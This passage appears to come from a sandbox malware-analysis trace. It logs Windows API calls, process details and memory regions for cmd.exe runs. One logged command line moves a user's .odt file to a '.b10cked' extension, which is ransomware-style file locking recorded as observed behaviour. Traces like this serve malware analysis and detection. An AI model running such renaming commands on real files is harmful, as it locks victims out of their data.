_get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.910] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, 
lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.911] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.911] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: 
hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.913] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.914] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, 
lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x32, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x32, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.915] _close (_FileHandle=4) returned 0 [0140.915] FindNextFileW (in: hFindFile=0x3f0eb8, lpFindFileData=0x28f21c | out: lpFindFileData=0x28f21c) returned 0 [0140.916] GetLastError () returned 0x12 [0140.916] FindClose (in: hFindFile=0x3f0eb8 | out: hFindFile=0x3f0eb8) returned 1 [0140.916] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.916] _close (_FileHandle=3) returned 0 [0140.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.917] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.917] SetConsoleInputExeNameW () returned 0x1 [0140.917] GetConsoleOutputCP () returned 0x1b5 [0140.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.918] exit (_Code=0) 
Process: id = "167" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14832 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14833 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14834 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14835 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14836 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14837 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14838 start_va = 0x77470000 end_va = 0x77470fff 
entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14839 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14840 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 14841 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15642 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15643 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15644 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15645 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 15646 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 15647 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15648 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15649 start_va = 0x76480000 end_va = 0x76489fff 
entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15650 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15651 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15652 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15653 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15654 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15655 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15656 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 15657 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15658 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15659 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15660 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15661 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15662 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15663 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 15664 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 15665 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 224 os_tid = 0xe64 [0140.364] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fecc | out: lpSystemTimeAsFileTime=0x26fecc*(dwLowDateTime=0x8d99ca80, dwHighDateTime=0x1d440a9)) [0140.364] GetCurrentProcessId () returned 0xf1c [0140.364] GetCurrentThreadId () returned 0xe64 [0140.364] GetTickCount () returned 0x2c13b [0140.364] QueryPerformanceCounter (in: lpPerformanceCount=0x26fec4 | out: lpPerformanceCount=0x26fec4*=19715620806) returned 1 [0140.368] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.368] __set_app_type (_Type=0x1) [0140.368] __p__fmode () returned 0x76b331f4 [0140.368] __p__commode () returned 0x76b331fc [0140.368] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.368] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.368] GetCurrentThreadId () returned 0xe64 [0140.368] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe64) returned 0x38 [0140.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.369] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.369] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.369] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe5c | out: phkResult=0x26fe5c*=0x0) returned 0x2 [0140.369] VirtualQuery (in: lpAddress=0x26fe93, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x270000, AllocationBase=0x270000, 
